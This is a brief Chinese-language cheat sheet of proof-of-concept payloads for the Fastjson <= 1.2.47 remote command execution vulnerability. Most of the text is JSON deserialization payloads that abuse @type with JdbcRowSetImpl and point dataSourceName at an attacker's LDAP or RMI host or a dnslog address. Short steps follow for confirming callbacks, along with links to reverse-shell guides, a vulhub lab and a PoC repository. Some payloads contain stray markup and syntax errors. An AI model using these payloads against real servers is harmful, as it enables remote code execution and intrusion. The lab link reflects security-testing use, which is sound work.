Fastjson <= 1.2.47 远程命令执行漏洞利用工具及方法记录
poc
rmi://、ldap:// 可以切换尝试。
param={
"@type": "java.lang.Class",
br / > "a": {
"@type": "java.lang.Class",
"val": "com.sun.rowset.JdbcRowSetImpl"
"@type": "com.sun.rowset.JdbcRowSetImpl",
br / >
},
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://your ip/",
"autoCommit": true
}
}
param={
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://your ip/",
"autoCommit":true
}
}
param={"orderNo":"B200414195915053000","partnerOrderNo":"DC200414593341","x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://your ip/","autoCommit":true}}
param={"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://your ip/","autoCommit":true}}}
param={"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://9jo6zi.dnslog.cn","autoCommit":true}
param={"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://your ip/","autoCommit":true}
如果监听服务器有流量,可以继续下一步,可以使用dnslog。
参考
反弹shell
https://blog.csdn.net/Jiajiajiang_/article/details/103255659
复现pyload
https://blog.51cto.com/13770310/2425330?source=dra
靶场
https://vulhub.org/#/environments/fastjson/1.2.24-rce/
教程
https://github.com/shengqi158/fastjson-remote-code-execute-poc